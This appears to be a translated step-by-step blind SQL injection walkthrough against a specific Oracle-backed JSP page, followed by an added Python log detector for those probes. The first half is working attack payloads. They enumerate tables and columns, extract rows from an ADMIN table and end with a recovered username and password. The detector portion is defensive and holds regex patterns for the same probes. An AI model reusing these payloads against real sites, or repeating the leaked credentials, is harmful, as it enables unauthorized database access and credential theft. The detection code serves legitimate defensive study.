1 web/cxview.jsp?id=14499  Comment support: -- is not supported.

2 and (select count(1) from sysobjects)%3E0 and 1=1  Errors out, so it is most likely an Oracle database (sysobjects is a SQL Server table; %3E is URL-encoded >).

3 web/cxview.jsp?id=14499 and (select count(table_name) from user_tables)%3E0 and 1=1  Page renders normally, confirming Oracle.

order by 1 works, order by 2 errors out: the query returns only one column.

But frustratingly...

and 1=2 union select null from dual  errors out

union all select null from dual--  errors out as well; dual may not exist

and exist (select * from dual)  errors out

Determine how many digits the table count has: and (select length(count(*)) from user_tables)=2 and 1=1  e.g. 10 tables is a two-digit number, so =2.

Guess the digits of the count. First digit: and (select ascii(substr(count(*),1,1)) from user_tables)%3E64 and 1=1

and (select ascii(substr(count(*),2,1)) from user_tables)%3E64 and 1=1  second digit

Keep adjusting the comparison value; in the end the first digit is 3 and the second is 5, so there are 35 tables in total.

Length of the first table name: and (select length(table_name) from (select rownum r,table_name from (select rownum r,table_name from user_tables where rownum%3C=1 order by 1 desc) t where r%3E1-1 order by 1)t)=5 and 1=1

ASCII code of the first character of the first table name (for the Nth character, change the first 1 in substr(table_name,1,1) to N): and (select ascii(substr(table_name,1,1)) from (select rownum r,table_name from (select rownum r,table_name from user_tables where rownum%3C=1 order by 1 desc) t where r%3E1-1 order by 1)t)%3C=256 and 1=1

ASCII code of the first character of the second table name:

and (select ascii(substr(table_name,1,1)) from (select rownum r,table_name from (select rownum r,table_name from user_tables where rownum%3C=2 order by 1 desc) t where r%3E2-1 order by 1)t)%3C=256 and 1=1

Columns of the admin table:

Determine how many columns:

and (select length(count(*)) from user_tab_columns where table_name=chr(65)%7C%7Cchr(68)%7C%7Cchr(77)%7C%7Cchr(73)%7C%7Cchr(78))=2 and 1=1  the column count is a two-digit number; %7C%7C decodes to ||

chr(65)%7C%7Cchr(68)%7C%7Cchr(77)%7C%7Cchr(73)%7C%7Cchr(78) = A||D||M||I||N, i.e. the string ADMIN

Second digit:

and (select ascii(substr(count(*),2,1)) from user_tab_columns where table_name=chr(65)%7C%7Cchr(68)%7C%7Cchr(77)%7C%7Cchr(73)%7C%7Cchr(78))=49 and 1=1  ascii=49

The first digit is also ascii 49, i.e. 1, so there are 11 columns in total:

Length of the first column name:

and (select length(column_name) from (select rownum r,column_name from (select rownum r,column_name from user_tab_columns where rownum%3C=1 and table_name=chr(65)%7C%7Cchr(68)%7C%7Cchr(77)%7C%7Cchr(73)%7C%7Cchr(78) order by 1 desc) t where r%3E1-1 order by 1)t)%3C=32 and 1=1

Length of the second column name: change only these two places, rownum%3C=1 and where r%3E1-1 (i.e. rownum<=1 and r>1-1); for the second column they naturally become

rownum%3C=2 where r%3E2-1

First character of the first column name:

and (select ascii(substr(column_name,1,1)) from (select rownum r,column_name from (select rownum r,column_name from user_tab_columns where rownum%3C=1 and table_name=chr(65)%7C%7Cchr(68)%7C%7Cchr(77)%7C%7Cchr(73)%7C%7Cchr(78) order by 1 desc) t where r%3E1-1 order by 1)t)%3E88 and 1=1

First character of the second column name: change the same two places as above, rownum%3C=1 and where r%3E1-1; for the Nth character change (column_name,N,1).

The end result: username and password; the remaining columns usually do not need to be guessed.

Next, dump the contents:

Again, first determine how many records there are:

and (select length(count(*)) from admin where 1=1)=3 and 1=1  renders normally, so the record count has three digits

ASCII code of the first digit of the count: and (select ascii(substr(count(*),1,1)) from admin where 1=1)%3C=256 and 1=1

The three ASCII codes come out as 54 51 55, i.e. 637 records.

Guess the contents of the username field:

First guess the length to see how many characters it has

and (select length(username) from (select rownum r,username from (select rownum r,username from admin where rownum%3C=1 and 1=1 order by 1 desc) t where r%3E1-1 order by 1)t)=4 and 1=1

Here it is 4 bytes long.

Normally a length will not exceed 10 bytes; if it does, wrap it in count() to first guess how many digits the length has, then guess each digit to get the length. The same works for the lengths of other tables and columns.

For example: and (select length(count(username)) from (select rownum r,username from (select rownum r,username from admin where rownum%3C=1 and 1=1 order by 1 desc) t where r%3E1-1 order by 1)t)=1 and 1=1  normally not more than 9, i.e. one digit; if it is more, try =2 instead.

ASCII code of the first character of the username field:

and (select ascii(substr(username,1,1)) from (select rownum r,username from (select rownum r,username from admin where rownum%3C=1 and 1=1 order by 1 desc) t where r%3E1-1 order by 1)t)%3C=256 and 1=1

For a given character of a given record, only the parts that were highlighted in red above need changing (the row number in rownum%3C=N / r%3EN-1 and the position in substr); the principle is the same as before.

The password works the same way: just replace the username field with the password field, here password.

Final result: username:dhbg pwd:1236
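Every probe in this write-up leaves the same fingerprints in the web server's access log: URL-encoded comparison operators, Oracle dictionary views (user_tables, user_tab_columns), ascii(substr(...)) character probing, rownum-based row paging, chr()||chr() concatenation hiding the table name (A||D||M||I||N above), and a trailing "and 1=1". The following detector is an added example written for this page, not code from the original post: it URL-decodes each query parameter, folds chr() concatenations back into the literal they build, and flags a request when at least two of those indicators appear together. The log lines, the indicator names and the two-indicator threshold are constructed assumptions for illustration.

```python
import re
from urllib.parse import parse_qsl, unquote_plus, urlsplit

# Constructed sample access-log lines (not from the original post). The first
# three reproduce the probe shapes described above; the last two are benign.
SAMPLE_LOG = """\
10.0.0.5 - - [01/Jan/2024:10:00:01 +0800] "GET /web/cxview.jsp?id=14499%20and%20(select%20count(table_name)%20from%20user_tables)%3E0%20and%201=1 HTTP/1.1" 200 5120
10.0.0.5 - - [01/Jan/2024:10:00:02 +0800] "GET /web/cxview.jsp?id=14499%20and%20(select%20ascii(substr(count(*),2,1))%20from%20user_tab_columns%20where%20table_name=chr(65)%7C%7Cchr(68)%7C%7Cchr(77)%7C%7Cchr(73)%7C%7Cchr(78))=49%20and%201=1 HTTP/1.1" 200 5120
10.0.0.5 - - [01/Jan/2024:10:00:03 +0800] "GET /web/cxview.jsp?id=14499%20and%20(select%20ascii(substr(username,1,1))%20from%20(select%20rownum%20r,username%20from%20(select%20rownum%20r,username%20from%20admin%20where%20rownum%3C=1%20and%201=1%20order%20by%201%20desc)%20t%20where%20r%3E1-1%20order%20by%201)t)%3C=256%20and%201=1 HTTP/1.1" 200 5120
10.0.0.7 - - [01/Jan/2024:10:00:04 +0800] "GET /web/cxview.jsp?id=14499 HTTP/1.1" 200 5120
10.0.0.8 - - [01/Jan/2024:10:00:05 +0800] "GET /web/cxview.jsp?id=14500&lang=en HTTP/1.1" 200 4880
"""

REQUEST_RE = re.compile(r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+"')
CHR_RE = re.compile(r"chr\((\d+)\)", re.I)
# A run of chr(n) calls joined with the Oracle || concatenation operator.
CHR_CONCAT_RE = re.compile(r"chr\(\d+\)(?:\s*\|\|\s*chr\(\d+\))*", re.I)

# Indicator names are constructed labels for this example.
INDICATORS = {
    "oracle_dictionary": re.compile(r"\b(user_tables|user_tab_columns|all_tables|dual)\b", re.I),
    "mssql_dictionary": re.compile(r"\bsysobjects\b", re.I),
    "boolean_tail": re.compile(r"\band\s+1\s*=\s*[12]\b", re.I),
    "char_by_char": re.compile(r"\bascii\s*\(\s*substr\s*\(", re.I),
    "length_probe": re.compile(r"\blength\s*\(", re.I),
    "rownum_paging": re.compile(r"\brownum\b", re.I),
    "order_by_probe": re.compile(r"\border\s+by\s+\d+\b", re.I),
    "union_probe": re.compile(r"\bunion\s+(?:all\s+)?select\b", re.I),
}


def url_decode(value: str, rounds: int = 3) -> str:
    """Undo URL encoding, repeating a few times to catch double-encoded payloads."""
    for _ in range(rounds):
        decoded = unquote_plus(value)
        if decoded == value:
            return value
        value = decoded
    return value


def decode_chr_concat(sql: str) -> str:
    """Fold chr(65)||chr(68)||... back into the quoted literal it builds ('ADMIN')."""
    def fold(match: re.Match) -> str:
        text = "".join(chr(int(n)) for n in CHR_RE.findall(match.group(0)))
        return "'" + text + "'"
    return CHR_CONCAT_RE.sub(fold, sql)


def analyze_target(target: str) -> list:
    """Return one finding per query parameter of a request target."""
    parts = urlsplit(target)
    findings = []
    for name, raw in parse_qsl(parts.query, keep_blank_values=True):
        decoded = url_decode(raw)
        folded = re.sub(r"\s+", " ", decode_chr_concat(decoded)).strip()
        hits = [label for label, rx in INDICATORS.items() if rx.search(folded)]
        if CHR_RE.search(decoded):
            hits.append("chr_obfuscation")
        findings.append({
            "path": parts.path,
            "param": name,
            "decoded": folded,
            "indicators": hits,
            # Constructed threshold: two independent indicators on one parameter.
            "flagged": len(hits) >= 2,
        })
    return findings


def scan_log(log_text: str) -> list:
    """Scan combined-format access-log lines and return the flagged findings."""
    findings = []
    for line in log_text.splitlines():
        match = REQUEST_RE.search(line)
        if not match:
            continue
        client_ip = line.split(" ", 1)[0]
        for finding in analyze_target(match.group("target")):
            if finding["flagged"]:
                finding["ip"] = client_ip
                findings.append(finding)
    return findings


if __name__ == "__main__":
    for f in scan_log(SAMPLE_LOG):
        print(f"{f['ip']} {f['path']} param={f['param']} indicators={f['indicators']}")
        print("    decoded:", f["decoded"])
```

Folding the chr() concatenation before matching matters: a rule that only looks for the literal string ADMIN would miss the encoded form, while the decoded value makes the targeted table obvious to the analyst reading the alert. The same normalisation step (decode, fold, then match) applies to any other encoding the application happens to accept.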